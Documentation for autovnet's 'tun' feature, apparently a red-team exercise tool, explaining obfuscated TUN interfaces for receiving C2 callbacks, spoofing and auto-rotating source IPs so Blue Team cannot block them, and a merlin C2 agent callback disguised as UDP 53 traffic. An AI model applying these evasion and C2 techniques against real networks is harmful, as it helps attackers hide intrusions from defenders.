# Tun

[TOC]

## Intro

You probably know that `autovnet` supports magic [proxying](./proxy.md) and magic [listening](./listen.md).
Those techniques are lightweight and flexible, and if you can, you should prefer to use them.

But the `proxy` and `listen` primitives only support `TCP` traffic.
What if you need to send `UDP`, `ICMP`, or even raw `IP` packets?

Use a `tun`!

`autovnet`'s `tun` primitive is extremely powerful, supporting any `IP`-based protocol (i.e. arbitrary `L3` traffic) through the use of a [Unix TUN](https://en.wikipedia.org/wiki/TUN/TAP).

## How it Works

[The techinical details are here.](../../rtfm/autovnet.md). This is the quick version.

When you connect to a VPN, you get a `TUN` interface locally, and it can handle any `IP` traffic, and everything Just Works (TM).

`autovnet`'s `tun` feature creates a VPN-like `TUN` interface that magically obfuscates your packets.

So when you bring up a `tun`, you get a random IP address that is mapped 1:1 to your local `TUN` address (the `IP` address of your `TUN` interface, as shown by the `ip a` command).


## Listen Tun

A listen `tun` can only accept callbacks (the target must initiate the connection to you).
You can have as many listen `tun`s at the same time as you want!!

### Example

```bash
$ autovnet rtfm tun up
[*] Waiting for IPAM ...
[+] IPAM is ready!

[+] autovnet rtfm tun up foamy_benefit
[+] tun_ip: 169.254.0.4

[*] Starting nebula...
[*] Waiting for rtfm-216a4d5f51 / rtfm-foamy-benefit ...
[+] tun is ready!

[+] map_ip: 10.242.91.92
[>] Roll new IP?
 [y/N]:
```

Let's break down this output.

The first `tun` will take a while, so there are some status messages to keep you in the loop.

`tun_ip` (here, `169.254.0.4`) is the `IP` address assigned to your local `TUN` interface.
This is the _local_ end of you `tun`. A target cannot connect to the _local_ end of your tun.

You might be thinking:

>  _Huh?_ `169.254.0.0/16` are [Link-Local Addresses](https://en.wikipedia.org/wiki/Link-local_address)

This is intentional, to help avoid confusion. These addresses are visually distinct and not routable, so it helps make it obvious that we are trusting `autovnet` to magic our packets into being valid :)

> [Link-local addresses](https://en.wikipedia.org/wiki/Link-local_address) may be assigned manually by an administrator ...

> Look at me. I am the _administrator_ now
>   - `autovnet`

If you are starting the C2 server, you can bind to your `tun_ip` (or `0.0.0.0`).

`autovnet rtfm tun up foamy_benefit` is the command you could run to re-create this `TUN` (with local `IP` `169.254.0.4`) in the future.

* Warning: make sure you do not have a conflicting `tun` running before you start a new `up`. This isn't validated, and will probably break both `tun`'s (just stop both and re-run the `tun up`)

`rtfm-216a4d5f51 / rtfm-foamy-benefit` is the interface name / interface alias as shown by `ip a` / `ip link show`.
You may be able to use these interface names in your favorite tools (e.g. `metasploit`).

`map_ip` (here, `10.242.91.92`) is the _public_ end of your `tun`. This is the `IP` that a target would connect to.

* Due to side-effects of magic, you (the player who ran `tun up`) can't actually connect to this `IP`. But other players and targets can.

`Roll new IP?` - That's right, you can instantly change the _public_ end of your `tun`, and can change it freely, as many times as you want, without ever disconnecting! (Just enter `y`)

The _local_ end of your `tun` (your `tun_ip`) does not change. So you don't need to restart any services if you roll your `map_ip`.

When you roll an `IP` any active connections (e.g. active `TCP` sessions) connected to the old `IP` are preserved, but new connections will fail.

E.g. if you caught a `TCP` reverse shell, you can roll your IP without breaking it. But if you have a beaconing RAT, the next beacon will fail if you roll your `IP`.

Want more `IP`s ?! 

> _*slaps roof of `autovnet`*_
> This bad boy can fit so many addresses in it

You can have as many listen `tun`s as you want, e.g.

* Separately rollable `IP`s for different C2 servers
* Exposing the same C2 server via separate `IP`s - each accessed only by a single target

```bash
autovnet rtfm tun up --new
[*] Waiting for IPAM ...
[+] IPAM is ready!

[+] autovnet rtfm tun up axiomatic_head
[+] tun_ip: 169.254.0.5

[*] Starting nebula...
[*] Waiting for rtfm-9fcf54ce5c / rtfm-axiomatic-head ...
[+] tun is ready!

[+] map_ip: 10.196.119.98
[>] Roll new IP?
 [y/N]:
```

Now that we have some `map_ip`s, let's start a new service and prove that target's can access it over both `map_ip`s, with no additional configuration.

(All ports on `tun_ip` are immediately exposed, so you can bind to any port you want).

Player:
```bash
$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Target:
```bash
$ curl 10.242.91.92:8000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
...
</html>
                                                                                                                                                            
$ curl 10.196.119.98:8000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
...
</html>
```

Player gets both connections:
```bash
$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.49.1 - - [30/Mar/2022 20:13:08] "GET / HTTP/1.1" 200 -
192.168.49.1 - - [30/Mar/2022 20:13:28] "GET / HTTP/1.1" 200 -
```

In this case, `192.168.49.1` is the true `IP` of the target.
Connections to the `tun` listener exposes the "public" `IP` of the target, which might be the "true" `IP` (that the target would see in their own `ip a` / `ipconfig` output).
But if the target is behind a NAT, then the connections would be "from" the NAT address.

Remember, any tool that needs unique peer addresses / connections to come directly from a target are bad tools, because they not compatible with redirection.
But if you absolutely must use a tool like that, then `tun` listeners may give you more accurate peer addresses than [callbacks proxied through `listen`](./listen.md) (which all show up as from `localhost`).

### Redirect Example

The `autovnet rtfm tun redirect` command provides additional flexibility in how you use your `tun` IP.

Let's consider the following (relatively common) scenario:
You want to use a DNS-based payload / want your traffic to appear on the wire as `UDP 53`.

`tun` allows you to receive UDP traffic, but unfortunately, `UDP 53` is probably already bound on your system by `systemd-resolve` or similar (it's part of how your system handles its own DNS).

The `redirect` command fixes this by allowing you to

1. Start a listener on a port you can actually bind to
2. Configure your payload with the port you want the target to see
3. Make sure the packets your payload sends reach your listener


#### Binding to UDP 53

Here is a quick example with `merlin` (see [merlin usage](../pwn/merlin.md) for more details):

##### Create the Tun
```bash
$ autovnet rtfm tun up 
...
[+] autovnet rtfm tun up tiny_training
...
[+] map_ip: 254.63.187.123
```

##### Start Merlin

```bash
$ autovnet rtfm merlin server
...
[+] autovnet rtfm merlin wretched_concept
[+] listen: autovnet rtfm merlin listener wretched_concept
...
Merlin»
```

##### Start Listener

Note that we cannot actually bind to UDP `:53`, but we want our packets to be UDP `:53`.

```bash
autovnet rtfm merlin listener wretched_concept -P http3 -p 53 --dest-port 5553
```

That command starts a `merlin` listener on UDP `:5553`, which we can confirm in the `merlin` shell:

```bash
Merlin» listeners 
Merlin[listeners]» list

+-----------------+-----------+------+----------+---------+--------------------------------+
|      NAME       | INTERFACE | PORT | PROTOCOL | STATUS  |          DESCRIPTION           |
+-----------------+-----------+------+----------+---------+--------------------------------+
| charming_island |  0.0.0.0  | 5553 |  HTTP3   | Running |    agent -proto http3 -url     |
|                 |           |      |          |         |       https://MAP_IP:53        |
+-----------------+-----------+------+----------+---------+--------------------------------+
```

##### Create the Redirect

Here, we use codename from the previous `tun` command.

We match UDP packets that come in via our `tiny_training` `tun` with a destination port `53.
We then `redirect` those packets (modify the destination port) to be `5553`.

In other words, we `-m`atch the packets our payloadd will send, and redirect them `-t`o our listener, on port `:5553`

```bash
$ autovnet rtfm tun redirect -P udp -m 53 -t 5553 tiny_training
[+] :53 => :5553
```

The redirect is active until we `CTRL+C`, which will delete it for us.

##### Deploy Payload

**Note: payload must run on a different system because of routing weirdness**

Here, we use `254.63.187.123` (the `map_ip` reported by our `tun`) and `:53`, which is the left side of our `redirect`
```bash
./agent -proto http3 -url https://254.63.187.123:53 -sleep 10s -skew 15
```

Our merlin server gets a successful checkin, indicating that our packets reached the `http3` listener, running on `:5553 (UDP)`.


## Connect Tun

A _connect_ `tun` is very similar to a _listen_ `tun`, but it allows you to change the source `IP` that targets will see when you connect.

Remember, `autovnet`'s `.proxy` feature is awesome, but can only deliver `TCP` traffic, and is not compatibile with all tools.
A _connect_ `tun` allows delivering arbitrary `IP` traffic, and is tool agnostic.

(Don't worry, you can still use `.proxy` while you have a `tun` up - the `.proxy` will ignore local routes, bypassing the `tun`)

This works by specifying one or more IP addresses (or CIDR networks) that should be routed through the `tun`.
Because of this, any existing connections to the target network(s) will break when you bring the `tun` up or down,
but you can freely roll your `IP` while it's up without breaking anything.

### Example

Assuming a target network of `192.168.49.0/24`, the player can easily create a connect `tun`:

```bash
$ autovnet rtfm tun up -r 192.168.49.0/24                                             
[*] Waiting for IPAM ...
[+] IPAM is ready!

[+] autovnet rtfm tun up ten_dot
[+] tun_ip: 169.254.0.2

[*] Starting nebula...
[*] Waiting for rtfm-a676147be3 / rtfm-ten-dot ...
[+] tun is ready!

[+] map_ip: 10.204.73.46
[>] Roll new IP?
 [y/N]:
```

Now, all new `IP` connections to `192.168.49.0/24` are routed through the `tun` and mapped to `10.204.73.46` by the `autovnet server`.

We can demonstrate this by connecting to a target while the `tun` is up:
```bash
# Player
$ .ssh 192.168.49.1

# Target
$ echo $SSH_CLIENT
10.204.73.46 59106 22
                                                                                                                            
$ sudo ss -untap | grep 10.204.73.46
tcp   ESTAB  0      0           192.168.49.1:22   10.204.73.46:59106 users:(("sshd",pid=1446,fd=4),("sshd",pid=1439,fd=4))
```

From the target's perspective, the `ssh` connection came from the `map_ip`, `10.204.73.46`.

To further demonstrate the power of `tun`, let's leave the `ssh` session open and roll a new `IP` (by entering `y` at the prompt).

```bash
...
[>] Roll new IP?
 [y/N]: y
[+] map_ip: 10.202.45.202
[>] Roll new IP?
 [y/N]:
```

The previously created `ssh` session is unaffected (and from the target's perspective, is still from `10.204.73.46`.

But now, new connections will use `10.202.45.202` as the source IP.

To demonstrate that any `IP` traffic can be delivered, we'll start a `UDP` service on target:

```bash
# Target
$ nc -nvlup 5353
```

Now, from the player machine, we'll send some `ICMP` traffic (with `ping`) and `UDP` traffic (with `nc`)

```bash
# The ping is successful
$ ping -c 1 192.168.49.1
PING 192.168.49.1 (192.168.49.1) 56(84) bytes of data.
64 bytes from 192.168.49.1: icmp_seq=1 ttl=62 time=1.16 ms

--- 192.168.49.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.160/1.160/1.160/0.000 ms
```

```bash
# The UDP connection is successful
$ nc -nvz -u 192.168.49.1 5353
Connection to 192.168.49.1 5353 port [udp/*] succeeded!
```

Again, from the target's perspective, all connections come from the current `map_ip` (`10.202.45.202`).
```bash
# Target
$ nc -nvlup 5353
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5353
Ncat: Listening on 0.0.0.0:5353
Ncat: Connection from 10.202.45.202.
XXXXX
```

If so inclined, you can do a packet capture on target to further demonstrate that only the `map_ip` (`10.202.45.202`) is visibile to the target.
```bash
# Target
$ sudo tcpdump -vvn -i eth0 icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

# This is the PING
17:06:28.153097 IP (tos 0x0, ttl 63, id 48669, offset 0, flags [DF], proto ICMP (1), length 84)
    10.202.45.202 > 192.168.49.1: ICMP echo request, id 8, seq 1, length 64

# This is the PING reply
17:06:28.153158 IP (tos 0x0, ttl 64, id 64134, offset 0, flags [none], proto ICMP (1), length 84)
    192.168.49.1 > 10.202.45.202: ICMP echo reply, id 8, seq 1, length 64
```

## Auto-Roll

Changing your `tun`'s `map_ip` is easy: just enter `y` at the prompt.

But you can also roll your `map_ip` at a fixed interval, with the `-i` option.
This generally makes the most sense when used with `-r` for a _connect_ `tun`.

By running a command like:
```bash
$ autovnet rtfm tun up -r 192.168.49.0/24 -i 60
```
... at the start of an event, your "public" (target-facing) `IP` will automatically change every 60 seconds!

You should always `.proxy` when you can, and you can always enter `y` to roll a new `IP` immediately,
but with all Red Teamers running a rolling _connect_ `tun` in the background, Blue Team will experience massive `IP` variety in their logs / PCAPs.

This also severely disincentivizes blocking `IP` addresses, since it's trivially easy for Red Team to map a new `IP`,
and any candidate `IP` for blocking could very likely already be rotated by the time it is blocked.


### Example

Here is an example of sending a `ping` every minute:
```bash
# Player
$ while :; do ping -c 1 192.168.49.1; sleep 60; done

# Target (tcpdump)
...
10.196.69.193 > 192.168.49.1: ICMP echo request, id 16, seq 1, length 64
10.202.22.138 > 192.168.49.1: ICMP echo request, id 17, seq 1, length 64
10.254.232.65 > 192.168.49.1: ICMP echo request, id 18, seq 1, length 64
10.235.185.119 > 192.168.49.1: ICMP echo request, id 19, seq 1, length 64
10.192.10.97 > 192.168.49.1: ICMP echo request, id 20, seq 1, length 64
10.251.224.41 > 192.168.49.1: ICMP echo request, id 21, seq 1, length 64
10.200.244.162 > 192.168.49.1: ICMP echo request, id 22, seq 1, length 64
10.214.237.140 > 192.168.49.1: ICMP echo request, id 23, seq 1, length 64
10.244.74.141 > 192.168.49.1: ICMP echo request, id 24, seq 1, length 64
10.207.80.133 > 192.168.49.1: ICMP echo request, id 25, seq 1, length 64
10.217.91.96 > 192.168.49.1: ICMP echo request, id 27, seq 1, length 64
10.210.55.137 > 192.168.49.1: ICMP echo request, id 28, seq 1, length 64
10.195.68.76 > 192.168.49.1: ICMP echo request, id 29, seq 1, length 64
10.234.83.239 > 192.168.49.1: ICMP echo request, id 30, seq 1, length 64
10.231.158.109 > 192.168.49.1: ICMP echo request, id 31, seq 1, length 64
```

Each packet has a unique source `IP`, due to the periodic `IP` rotation.
